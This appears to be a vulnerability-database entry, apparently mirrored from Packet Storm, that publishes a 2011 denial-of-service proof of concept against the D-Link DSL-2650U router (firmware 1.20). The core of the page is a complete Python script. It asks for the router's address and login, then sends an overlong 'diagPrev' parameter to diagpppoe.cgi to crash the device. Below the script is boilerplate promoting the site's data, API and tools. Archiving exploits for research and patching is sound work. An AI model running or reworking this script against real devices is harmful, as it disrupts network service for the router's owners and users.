Lucene search
+L

D-Link DSL-2650U Denial Of Service

🗓️ 07 Jul 2011 00:00:00Reported by Li'el FridmanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

D-Link DSL-2650U Denial Of Service exploit by Li'el Fridman using Pytho

Code
`# Exploit Title: Dlink DSL-2650U DoS/PoC  
# Date: July 6th, 2011  
# Author: Li'el Fridman  
# Software Link:  
ftp://ftp.dlink.ru/pub/ADSL/DSL-2650U_BRU_D/Firmware/RU_1.20/DSL-2650U_BRU_D1_RU_1.20_06222011.zip  
# Version: 1.20  
# Tested on: Default firmware - Linux 2.6.8.1  
  
#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
  
import sys  
import os  
import urllib  
  
ip = raw_input('Please enter the router address: ')  
username = raw_input('Please enter the router user name: ')  
password = raw_input('Please enter the router password: ')  
path = 'http://{0}:{1}@{2}/diagpppoe.cgi?diagPrev=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.format(username, password, ip)  
print 'Trying {0}'.format(path)  
opener = urllib.urlopen(path)  
print 'Owned!'  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2011 00:00Current
7.4High risk
Vulners AI Score7.4
29